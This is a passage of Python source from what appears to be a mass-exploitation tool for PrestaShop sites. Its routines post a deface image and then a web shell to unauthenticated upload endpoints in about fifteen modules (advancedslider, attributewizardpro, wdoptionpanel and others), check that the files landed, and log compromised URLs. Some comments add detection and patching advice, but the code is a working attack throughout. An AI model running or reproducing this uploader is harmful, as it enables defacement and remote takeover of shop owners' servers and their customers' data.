  2243. self.Print_Vuln_index(IndexPath)
  2244. with open('result/Index_results.txt', 'a') as writer:
  2245. writer.write(IndexPath + '\n')
  2246. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2247. ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
  2248. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2249. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2250. self.Print_vuln_Shell(ShellPath)
  2251. with open('result/Shell_results.txt', 'a') as writer:
  2252. writer.write(ShellPath + '\n')
  2253. else:
  2254. self.Print_NotVuln('simpleslideshow', site)
  2255. else:
  2256. self.Print_NotVuln('simpleslideshow', site)
  2257. except:
  2258. self.Print_NotVuln('simpleslideshow', site)
  2259.  
  2260. def productpageadverts(self, site):
        # Upload probe against /modules/productpageadverts/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/productpageadverts/slides/ for the image ('GIF89a'), uploads
        # self.ShellPresta the same way and checks for the 'Vuln!!' marker.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2261. try:
  2262. Exp = site + '/modules/productpageadverts/uploadimage.php'
  2263. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2264. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2265. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2266. if 'success' in GoT.text.encode('utf-8'):
  2267. IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
  2268. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2269. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2270. self.Print_Vuln_index(IndexPath)
  2271. with open('result/Index_results.txt', 'a') as writer:
  2272. writer.write(IndexPath + '\n')
  2273. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2274. ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
  2275. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2276. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2277. self.Print_vuln_Shell(ShellPath)
  2278. with open('result/Shell_results.txt', 'a') as writer:
  2279. writer.write(ShellPath + '\n')
  2280. else:
  2281. self.Print_NotVuln('productpageadverts', site)
  2282. else:
  2283. self.Print_NotVuln('productpageadverts', site)
  2284. except:
  2285. self.Print_NotVuln('productpageadverts', site)
  2286.  
  2287. def homepageadvertise(self, site):
        # Upload probe against /modules/homepageadvertise/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/homepageadvertise/slides/ for the image ('GIF89a'), uploads
        # self.ShellPresta the same way and checks for the 'Vuln!!' marker.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2288. try:
  2289. Exp = site + '/modules/homepageadvertise/uploadimage.php'
  2290. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2291. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2292. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2293. if 'success' in GoT.text.encode('utf-8'):
  2294. IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
  2295. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2296. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2297. self.Print_Vuln_index(IndexPath)
  2298. with open('result/Index_results.txt', 'a') as writer:
  2299. writer.write(IndexPath + '\n')
  2300. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2301. ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
  2302. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2303. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2304. self.Print_vuln_Shell(ShellPath)
  2305. with open('result/Shell_results.txt', 'a') as writer:
  2306. writer.write(ShellPath + '\n')
  2307. else:
  2308. self.Print_NotVuln('homepageadvertise', site)
  2309. else:
  2310. self.Print_NotVuln('homepageadvertise', site)
  2311. except:
  2312. self.Print_NotVuln('homepageadvertise', site)
  2313.  
  2314. def homepageadvertise2(self, site):
        # Upload probe against /modules/homepageadvertise2/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/homepageadvertise2/slides/ for the image ('GIF89a'), uploads
        # self.ShellPresta the same way and checks for the 'Vuln!!' marker.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2315. try:
  2316. Exp = site + '/modules/homepageadvertise2/uploadimage.php'
  2317. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2318. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2319. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2320. if 'success' in GoT.text.encode('utf-8'):
  2321. IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
  2322. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2323. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2324. self.Print_Vuln_index(IndexPath)
  2325. with open('result/Index_results.txt', 'a') as writer:
  2326. writer.write(IndexPath + '\n')
  2327. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2328. ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
  2329. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2330. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2331. self.Print_vuln_Shell(ShellPath)
  2332. with open('result/Shell_results.txt', 'a') as writer:
  2333. writer.write(ShellPath + '\n')
  2334. else:
  2335. self.Print_NotVuln('homepageadvertise2', site)
  2336. else:
  2337. self.Print_NotVuln('homepageadvertise2', site)
  2338. except:
  2339. self.Print_NotVuln('homepageadvertise2', site)
  2340.  
  2341. def jro_homepageadvertise(self, site):
        # Upload probe against /modules/jro_homepageadvertise/uploadimage.php (multipart
        # field 'userfile', no session or credentials). On 'success' it checks
        # /modules/jro_homepageadvertise/slides/ for the image ('GIF89a'), uploads
        # self.ShellPresta the same way and checks for the 'Vuln!!' marker.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2342. try:
  2343. Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
  2344. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2345. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2346. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2347. if 'success' in GoT.text.encode('utf-8'):
  2348. IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
  2349. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2350. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2351. self.Print_Vuln_index(IndexPath)
  2352. with open('result/Index_results.txt', 'a') as writer:
  2353. writer.write(IndexPath + '\n')
  2354. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2355. ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
  2356. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2357. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2358. self.Print_vuln_Shell(ShellPath)
  2359. with open('result/Shell_results.txt', 'a') as writer:
  2360. writer.write(ShellPath + '\n')
  2361. else:
  2362. self.Print_NotVuln('jro_homepageadvertise', site)
  2363. else:
  2364. self.Print_NotVuln('jro_homepageadvertise', site)
  2365. except:
  2366. self.Print_NotVuln('jro_homepageadvertise', site)
  2367.  
  2368. def attributewizardpro(self, site):
        # Posts the local file self.Jce_Deface_image as multipart field 'userfile' to
        # /modules/attributewizardpro/file_upload.php, with no session or credentials.
        # A reply that contains the file's base name is taken as accepted; the text before
        # '|||' in the reply is used as the stored name under
        # /modules/attributewizardpro/file_uploads/. The image is verified by 'GIF89a',
        # then self.ShellPresta is posted the same way and checked for 'Vuln!!'.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to file_upload.php and unexpected files in file_uploads/ are
        # the traces; remove or update the module and deny script execution there.
  2369. try:
  2370. Exp = site + '/modules/attributewizardpro/file_upload.php'
  2371. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2372. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2373. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2374. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
  2375. Index = GoT.text.encode('utf-8').split('|||')[0]
  2376. print Index
  2377. IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
  2378. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2379. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2380. self.Print_Vuln_index(IndexPath)
  2381. with open('result/Index_results.txt', 'a') as writer:
  2382. writer.write(IndexPath + '\n')
  2383. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2384. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
  2385. Shell = Got2.text.encode('utf-8').split('|||')[0]
  2386. ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
  2387. CheckShell = requests.get('http://' + ShellPath, timeout=5)
  2388. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2389. self.Print_vuln_Shell(ShellPath)
  2390. with open('result/Shell_results.txt', 'a') as writer:
  2391. writer.write(ShellPath + '\n')
  2392. else:
  2393. self.Print_NotVuln('attributewizardpro', site)
  2394. else:
  2395. self.Print_NotVuln('attributewizardpro', site)
  2396. except:
  2397. self.Print_NotVuln('attributewizardpro', site)
  2398.  
  2399.  
  2400. def attributewizardpro2(self, site):
        # Same probe as attributewizardpro(), aimed at a module directory named
        # '1attributewizardpro': multipart field 'userfile' is posted to
        # /modules/1attributewizardpro/file_upload.php, the stored name is read from the
        # text before '|||' in the reply, and file_uploads/ is checked for 'GIF89a' and,
        # after the second upload, for 'Vuln!!'. Hits go to the result/ files.
        # Defender view: renamed copies of a module directory stay reachable over HTTP;
        # remove such leftovers and deny script execution in file_uploads/.
  2401. try:
  2402. Exp = site + '/modules/1attributewizardpro/file_upload.php'
  2403. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2404. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2405. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2406. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
  2407. Index = GoT.text.encode('utf-8').split('|||')[0]
  2408. print Index
  2409. IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
  2410. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2411. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2412. self.Print_Vuln_index(IndexPath)
  2413. with open('result/Index_results.txt', 'a') as writer:
  2414. writer.write(IndexPath + '\n')
  2415. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2416. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
  2417. Shell = Got2.text.encode('utf-8').split('|||')[0]
  2418. ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
  2419. CheckShell = requests.get('http://' + ShellPath, timeout=5)
  2420. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2421. self.Print_vuln_Shell(ShellPath)
  2422. with open('result/Shell_results.txt', 'a') as writer:
  2423. writer.write(ShellPath + '\n')
  2424. else:
  2425. self.Print_NotVuln('1attributewizardpro', site)
  2426. else:
  2427. self.Print_NotVuln('1attributewizardpro', site)
  2428. except:
  2429. self.Print_NotVuln('1attributewizardpro', site)
  2430.  
  2431. def attributewizardpro3(self, site):
        # Same probe as attributewizardpro(), aimed at a directory named
        # 'attributewizardpro.OLD': multipart field 'userfile' is posted to
        # /modules/attributewizardpro.OLD/file_upload.php, the stored name is read from the
        # text before '|||' in the reply, and file_uploads/ is checked for 'GIF89a' and,
        # after the second upload, for 'Vuln!!'. Hits go to the result/ files.
        # Defender view: a '.OLD' backup of a module left in the web root keeps its upload
        # endpoint live; delete such backups and deny script execution in file_uploads/.
  2432. try:
  2433. Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
  2434. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2435. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2436. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2437. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
  2438. Index = GoT.text.encode('utf-8').split('|||')[0]
  2439. print Index
  2440. IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
  2441. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2442. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2443. self.Print_Vuln_index(IndexPath)
  2444. with open('result/Index_results.txt', 'a') as writer:
  2445. writer.write(IndexPath + '\n')
  2446. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2447. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
  2448. Shell = Got2.text.encode('utf-8').split('|||')[0]
  2449. ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
  2450. CheckShell = requests.get('http://' + ShellPath, timeout=5)
  2451. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2452. self.Print_vuln_Shell(ShellPath)
  2453. with open('result/Shell_results.txt', 'a') as writer:
  2454. writer.write(ShellPath + '\n')
  2455. else:
  2456. self.Print_NotVuln('attributewizardpro.OLD', site)
  2457. else:
  2458. self.Print_NotVuln('attributewizardpro.OLD', site)
  2459. except:
  2460. self.Print_NotVuln('attributewizardpro.OLD', site)
  2461.  
  2462. def attributewizardpro_x(self, site):
        # Same probe as attributewizardpro(), aimed at /modules/attributewizardpro_x/:
        # multipart field 'userfile' is posted to file_upload.php, the stored name is read
        # from the text before '|||' in the reply, and file_uploads/ is checked for 'GIF89a'
        # and, after the second upload, for 'Vuln!!'. Hits go to the result/ files.
        # Any exception is reported as "not vulnerable" by the bare except.
        # Defender view: POSTs to file_upload.php and unexpected files in file_uploads/ are
        # the traces; remove or update the module and deny script execution there.
  2463. try:
  2464. Exp = site + '/modules/attributewizardpro_x/file_upload.php'
  2465. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2466. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2467. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2468. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
  2469. Index = GoT.text.encode('utf-8').split('|||')[0]
  2470. print Index
  2471. IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
  2472. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2473. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2474. self.Print_Vuln_index(IndexPath)
  2475. with open('result/Index_results.txt', 'a') as writer:
  2476. writer.write(IndexPath + '\n')
  2477. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2478. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
  2479. Shell = Got2.text.encode('utf-8').split('|||')[0]
  2480. ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
  2481. CheckShell = requests.get('http://' + ShellPath, timeout=5)
  2482. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2483. self.Print_vuln_Shell(ShellPath)
  2484. with open('result/Shell_results.txt', 'a') as writer:
  2485. writer.write(ShellPath + '\n')
  2486. else:
  2487. self.Print_NotVuln('attributewizardpro_x', site)
  2488. else:
  2489. self.Print_NotVuln('attributewizardpro_x', site)
  2490. except:
  2491. self.Print_NotVuln('attributewizardpro_x', site)
  2492.  
  2493. def advancedslider(self, site):
        # Probes /modules/advancedslider/ajax_advancedsliderUpload.php with
        # action=submitUploadImage and, if the GET returns HTTP 200, posts the local file
        # self.Jce_Deface_image as multipart field 'qqfile' to the same URL.
        # Only the image is uploaded in this routine; success is a 'GIF89a' body at
        # /modules/advancedslider/uploads/<base name>, recorded in result/Index_results.txt.
        # Defender view: requests to ajax_advancedsliderUpload.php and new files in uploads/
        # are the traces; remove or update the module and require an authenticated session
        # on its AJAX endpoint.
  2494. try:
  2495. Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
  2496. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2497. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
  2498. if Checkvuln.status_code == 200:
  2499. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2500. IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
  2501. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2502. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2503. self.Print_Vuln_index(IndexPath)
  2504. with open('result/Index_results.txt', 'a') as writer:
  2505. writer.write(IndexPath + '\n')
  2506. else:
  2507. self.Print_NotVuln('advancedslider', site)
  2508. else:
  2509. self.Print_NotVuln('advancedslider', site)
  2510. except:
  2511. self.Print_NotVuln('advancedslider', site)
  2512.  
  2513. def cartabandonmentpro(self, site):
        # Probes /modules/cartabandonmentpro/upload.php and, if the GET returns HTTP 200,
        # posts the local file self.Jce_Deface_image as multipart field 'image' to it.
        # Only the image is uploaded in this routine; success is a 'GIF89a' body at
        # /modules/cartabandonmentpro/uploads/<base name>, recorded in
        # result/Index_results.txt. Any exception is reported as "not vulnerable".
        # Defender view: requests to the module's upload.php and new files in uploads/ are
        # the traces; remove or update the module and keep upload.php behind authentication.
  2514. try:
  2515. Exp = site + '/modules/cartabandonmentpro/upload.php'
  2516. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2517. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
  2518. if Checkvuln.status_code == 200:
  2519. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2520. IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
  2521. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2522. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2523. self.Print_Vuln_index(IndexPath)
  2524. with open('result/Index_results.txt', 'a') as writer:
  2525. writer.write(IndexPath + '\n')
  2526. else:
  2527. self.Print_NotVuln('cartabandonmentpro', site)
  2528. else:
  2529. self.Print_NotVuln('cartabandonmentpro', site)
  2530. except:
  2531. self.Print_NotVuln('cartabandonmentpro', site)
  2532.  
  2533. def cartabandonmentproOld(self, site):
        # Same probe as cartabandonmentpro(), aimed at a directory named
        # 'cartabandonmentproOld': a GET of /modules/cartabandonmentproOld/upload.php that
        # returns HTTP 200 is followed by a POST of self.Jce_Deface_image as field 'image',
        # and uploads/<base name> is checked for 'GIF89a'. Hits go to
        # result/Index_results.txt.
        # Defender view: an 'Old' copy of a module left in the web root keeps its upload
        # endpoint live; delete such copies rather than renaming them.
  2534. try:
  2535. Exp = site + '/modules/cartabandonmentproOld/upload.php'
  2536. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2537. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
  2538. if Checkvuln.status_code == 200:
  2539. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2540. IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
  2541. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2542. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2543. self.Print_Vuln_index(IndexPath)
  2544. with open('result/Index_results.txt', 'a') as writer:
  2545. writer.write(IndexPath + '\n')
  2546. else:
  2547. self.Print_NotVuln('cartabandonmentproOld', site)
  2548. else:
  2549. self.Print_NotVuln('cartabandonmentproOld', site)
  2550. except:
  2551. self.Print_NotVuln('cartabandonmentproOld', site)
  2552.  
  2553. def videostab(self, site):
        # Probes /modules/videostab/ajax_videostab.php with action=submitUploadVideo and, if
        # the GET returns HTTP 200, posts the local file self.Jce_Deface_image as multipart
        # field 'qqfile' to the same URL.
        # Only the image is uploaded in this routine; success is a 'GIF89a' body at
        # /modules/videostab/uploads/<base name>, recorded in result/Index_results.txt.
        # Defender view: requests to ajax_videostab.php and new files in uploads/ are the
        # traces; remove or update the module and require an authenticated session on its
        # AJAX endpoint.
  2554. try:
  2555. Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
  2556. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2557. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
  2558. if Checkvuln.status_code == 200:
  2559. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2560. IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
  2561. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2562. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2563. self.Print_Vuln_index(IndexPath)
  2564. with open('result/Index_results.txt', 'a') as writer:
  2565. writer.write(IndexPath + '\n')
  2566. else:
  2567. self.Print_NotVuln('videostab', site)
  2568. else:
  2569. self.Print_NotVuln('videostab', site)
  2570. except:
  2571. self.Print_NotVuln('videostab', site)
  2572.  
  # Probe of /modules/wg24themeadministration/wg24_ajax.php.
  # Flow as written: GET the handler; on HTTP 200, POST two files in turn
  # (self.Jce_Deface_image, then self.ShellPresta) as multipart field 'bajatax'
  # with form data data=bajatax, type=pattern_upload. After each POST the
  # expected URL under .../img/upload/ is fetched; 'GIF89a' marks the image and
  # 'Vuln!!' marks the second file. Hits go to result/Index_results.txt and
  # result/Shell_results.txt.
  # Defender notes: 'type=pattern_upload' in an anonymous POST body and new
  # files in img/upload/ are the indicators. Beyond removing or updating the
  # module, configure the web server so nothing in an upload directory is
  # executed as a script.
  # NOTE(review): self.ShellPresta is defined outside this view; its contents
  # and filename are not confirmed here.
  2573. def wg24themeadministration(self, site):
  2574. Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
  2575. try:
  2576. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2577. if Checkvuln.status_code == 200:
  2578. PostData = {'data': 'bajatax',
  2579. 'type': 'pattern_upload'}
  2580. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
  2581. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
  2582. uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
  2583. uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
  2584. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
  2585. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2586. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2587. self.Print_Vuln_index(uploadedPathIndex)
  2588. with open('result/Index_results.txt', 'a') as writer:
  2589. writer.write(uploadedPathIndex + '\n')
  2590. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
  2591. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2592. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2593. self.Print_vuln_Shell(uploadedPathShell)
  2594. with open('result/Shell_results.txt', 'a') as writer:
  2595. writer.write(uploadedPathShell + '\n')
  2596. else:
  2597. self.Print_NotVuln('wg24themeadministration', site)
  2598. else:
  2599. self.Print_NotVuln('wg24themeadministration', site)
  2600. except:
  2601. self.Print_NotVuln('wg24themeadministration', site)
  2602.  
  2603.  
  # Probe of /modules/fieldvmegamenu/ajax/upload.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'images[]'; after each POST
  # the expected URL under /modules/fieldvmegamenu/uploads/ is fetched and the
  # body is searched for 'GIF89a' / 'Vuln!!'. Hits are appended to
  # result/Index_results.txt and result/Shell_results.txt.
  # Defender notes: anonymous POSTs to ajax/upload.php followed by GETs into
  # uploads/ are the log signature; any non-image file in that directory should
  # be treated as hostile. Remove or update the module and disable script
  # execution for the uploads/ directory.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2604. def fieldvmegamenu(self, site):
  2605. Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
  2606. try:
  2607. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2608. if Checkvuln.status_code == 200:
  2609. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
  2610. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
  2611. uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
  2612. uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
  2613. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2614. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2615. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2616. self.Print_Vuln_index(uploadedPathIndex)
  2617. with open('result/Index_results.txt', 'a') as writer:
  2618. writer.write(uploadedPathIndex + '\n')
  2619. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2620. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2621. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2622. self.Print_vuln_Shell(uploadedPathShell)
  2623. with open('result/Shell_results.txt', 'a') as writer:
  2624. writer.write(uploadedPathShell + '\n')
  2625. else:
  2626. self.Print_NotVuln('fieldvmegamenu', site)
  2627. else:
  2628. self.Print_NotVuln('fieldvmegamenu', site)
  2629. except:
  2630. self.Print_NotVuln('fieldvmegamenu', site)
  2631.  
  # Probe of /modules/wdoptionpanel/wdoptionpanel_ajax.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'bajatax' with form data
  # data=bajatax, type=image_upload; each POST is followed by a GET of the
  # expected URL under /modules/wdoptionpanel/upload/, checked for 'GIF89a' or
  # 'Vuln!!'. Hits are appended to the result/ files.
  # Defender notes: the fixed field name 'bajatax' together with
  # 'type=image_upload' in an anonymous request is a usable WAF/IDS match for
  # this tool's traffic. Remove or update the module, require a back-office
  # session on the AJAX endpoint, and block script execution in upload/.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2632. def wdoptionpanel(self, site):
  2633. Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
  2634. try:
  2635. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2636. if Checkvuln.status_code == 200:
  2637. PostData = {'data': 'bajatax',
  2638. 'type': 'image_upload'}
  2639. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
  2640. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
  2641. uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
  2642. uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
  2643. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
  2644. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2645. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2646. self.Print_Vuln_index(uploadedPathIndex)
  2647. with open('result/Index_results.txt', 'a') as writer:
  2648. writer.write(uploadedPathIndex + '\n')
  2649. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
  2650. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2651. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2652. self.Print_vuln_Shell(uploadedPathShell)
  2653. with open('result/Shell_results.txt', 'a') as writer:
  2654. writer.write(uploadedPathShell + '\n')
  2655. else:
  2656. self.Print_NotVuln('wdoptionpanel', site)
  2657. else:
  2658. self.Print_NotVuln('wdoptionpanel', site)
  2659. except:
  2660. self.Print_NotVuln('wdoptionpanel', site)
  2661.  
  2662.  
  # Probe of /modules/pk_flexmenu/ajax/upload.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'images[]'; after each POST
  # the expected URL under /modules/pk_flexmenu/uploads/ is fetched and checked
  # for 'GIF89a' / 'Vuln!!'. Hits are appended to result/Index_results.txt and
  # result/Shell_results.txt.
  # Defender notes: the first GET only tests that the handler exists, so a 200
  # on that URL for anonymous clients is already a finding. Remove or update
  # the module, restrict the handler to authenticated staff, and serve the
  # uploads/ directory as static content only.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2663. def pk_flexmenu(self, site):
  2664. Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
  2665. try:
  2666. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2667. if Checkvuln.status_code == 200:
  2668. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
  2669. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
  2670. uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
  2671. uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
